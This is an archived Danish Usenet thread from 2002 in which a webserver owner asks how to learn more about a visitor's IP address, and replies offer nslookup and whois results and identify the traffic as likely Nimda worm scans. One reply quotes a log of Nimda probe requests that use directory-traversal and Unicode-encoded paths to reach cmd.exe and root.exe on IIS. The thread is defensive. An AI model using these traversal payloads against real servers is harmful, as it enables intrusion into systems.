---

Davs!
Jeg har en Sambar webserver kørende. Jeg kan se brugernes IP adresse men kan
jeg finde ud af mere. F.eks er der en bruger på lige nu med IP 64.152.75.20

Jeg har prøvet tracert, men resultatet siger mig ikke rigtig noget.

Andre muligheder ?

Hilsen Bo

---

On Thu, 15 Aug 2002 15:49:56 +0200
"Bo Jørgensen" <bo@pc.dk> wrote:
> Davs!
> Jeg har en Sambar webserver kørende. Jeg kan se brugernes IP adresse
> men kan jeg finde ud af mere. F.eks er der en bruger på lige nu med IP
> 64.152.75.20
>
> Jeg har prøvet tracert, men resultatet siger mig ikke rigtig noget.
>
> Andre muligheder ?

nslookup giver følgende:

Name: trek13.sv.av.com
Address: 64.152.75.20


--
Kim Schulz - Freelance Development | Make it myself? But I'm a
www.schulz.dk - En nørds bekendelser | physical organic chemist!
www.linuxia.dk - hverdagens små hacks |

---

"Bo Jørgensen" <bo@pc.dk> wrote in message
news:3d5bb183$0$27863$edfadb0f@dspool01.news.tele.dk...
> Davs!
> Jeg har en Sambar webserver kørende. Jeg kan se brugernes IP adresse men
kan
> jeg finde ud af mere. F.eks er der en bruger på lige nu med IP
64.152.75.20
>
> Jeg har prøvet tracert, men resultatet siger mig ikke rigtig noget.

Hej Bo
Jeg tog lige et tjek med PC Finder og fik følgende
MVH
Bjarne Østergård



IP 64.152.75.20
08/15/02 16:40:53 whois trek13.sv.av.com
..com is a domain of USA & International Commercial
Searches for .com can be run at http://www.crsnic.net/

whois -h whois.crsnic.net av.com ...
Redirecting to NETWORK SOLUTIONS, INC.

whois -h whois.networksolutions.com av.com ...
The Data in the VeriSign Registrar WHOIS database is provided by VeriSign
for
information purposes only, and to assist persons in obtaining information
about
or related to a domain name registration record. VeriSign does not
guarantee
its accuracy. Additionally, the data may not reflect updates to billing
contact
information. By submitting a WHOIS query, you agree to use this Data only
for lawful purposes and that under no circumstances will you use this Data
to:
(1) allow, enable, or otherwise support the transmission of mass
unsolicited,
commercial advertising or solicitations via e-mail, telephone, or facsimile;
or
(2) enable high volume, automated, electronic processes that apply to
VeriSign
(or its computer systems). The compilation, repackaging, dissemination or
other use of this Data is expressly prohibited without the prior written
consent of VeriSign. VeriSign reserves the right to terminate your access
to
the VeriSign Registrar WHOIS database in its sole discretion, including
without limitation, for excessive querying of the WHOIS database or for
failure
to otherwise abide by this policy. VeriSign reserves the right to modify
these
terms at any time. By submitting this query, you agree to abide by this
policy.


Registrant:
Altavista Company (AV22-DOM)
1070 Arastadero
Rd.
Palo Alto, CA 94304
US

Domain Name: AV.COM

Administrative Contact:
AltaVista Domain Administration (AD14996-OR) dns-admin@AV.COM
AltaVista Company
c/o AltaVista Legal Department
1070 Arastradero Rd
Palo Alto, CA 94304
US
650-320-7700
Fax- 650-320-6433
Technical Contact:
AltaVista Company (AO111-ORG) dns-technical@AV.COM
AltaVista Company
1070 Arastradero Road
PALO ALTO, CA 94304
US
650-320-7700 fax: 650-330-6433

Record expires on 21-Oct-2003.
Record created on 21-Oct-1998.
Database last updated on 15-Aug-2002 10:40:55 EDT.

Domain servers in listed order:

NS1.ALTAVISTA.COM 209.73.164.76
NS2.ALTAVISTA.COM 209.73.164.7
NS3.ALTAVISTA.COM 209.73.176.204

---

Bjarne Østergård skrev:

> Jeg tog lige et tjek med PC Finder og fik følgende

Holdaop, programmet er bleget udvidet med Whois.

Kan det også finde pcere som har fået slettet partitionsoplysninger nu?
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >

---

"Peder Vendelbo Mikkelsen" <pedervm@myrealbox.com> wrote in message
news:ajhc12.3o.1@mjoelner.aaks.aarhus.dk...
> Bjarne Østergård skrev:
>
> > Jeg tog lige et tjek med PC Finder og fik følgende
>
> Holdaop, programmet er bleget udvidet med Whois.
Ja
> Kan det også finde pcere som har fået slettet partitionsoplysninger nu?
> --
> Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
> /skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >
>

---

"Peder Vendelbo Mikkelsen" <pedervm@myrealbox.com> wrote in message
news:ajhc12.3o.1@mjoelner.aaks.aarhus.dk...
> Bjarne Østergård skrev:
>
> > Jeg tog lige et tjek med PC Finder og fik følgende
>
> Holdaop, programmet er bleget udvidet med Whois.
>
> Kan det også finde pcere som har fået slettet partitionsoplysninger nu?
Ja
> Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
> /skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >
>

---

"Bo Jørgensen" wrote:
>
> Davs!
> Jeg har en Sambar webserver kørende.

Jeg kender ikke meget til den.

> Jeg kan se brugernes IP adresse men kan
> jeg finde ud af mere. F.eks er der en bruger på lige nu med IP 64.152.75.20
>
> Jeg har prøvet tracert, men resultatet siger mig ikke rigtig noget.
>
> Andre muligheder ?

Inden du kigger efter klientens IP addresse, så find ud af hvilke
filer den forsøger at hente. Det er sikkert bare Nimda.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

---

"Kasper Dupont" <kasperd@daimi.au.dk> skrev i
news:3D5BFF30.2F1A7283@daimi.au.dk
> "Bo Jørgensen" wrote:
> > Andre muligheder ?
>
> Inden du kigger efter klientens IP addresse, så find ud af hvilke
> filer den forsøger at hente. Det er sikkert bare Nimda.

[02/Jul/2002:21:29:11 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0
"-" "-"
[02/Jul/2002:21:29:11 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0
"-" "-"
[02/Jul/2002:21:29:12 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[02/Jul/2002:21:29:12 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[02/Jul/2002:21:29:12 +0200] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:13 +0200] "GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[02/Jul/2002:21:29:13 +0200] "GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[02/Jul/2002:21:29:14 +0200] "GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+
dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:15 +0200] "GET
/scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:15 +0200] "GET
/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:16 +0200] "GET
/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:16 +0200] "GET
/scripts/..Áo../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:17 +0200] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:17 +0200] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:18 +0200] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[02/Jul/2002:21:29:19 +0200] "GET
/scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"

Hej

Hvis det du ser ligner der jag har sat ind ovenover så er det NIMDA
virusinfiserede maskiner der undersøger om du bruger IIS fra microsoft.

PS jeg har fjernet IP nummeret fra mit udklip.


--
Hilsen
Peter N Petersen
http://peteropfinder.dk

---

15kw wrote:

> Hvis det du ser ligner der jag har sat ind ovenover så er det NIMDA
> virusinfiserede maskiner der undersøger om du bruger IIS fra microsoft.

Jeg har en log der ligner til forveksling, nu behøver jeg ikke
længere undre mig over hvem det var der forsøgte at få
uautoriseret adgang.

--
Hygge..
Thomas

<http://carftp.com> - a library of car videos.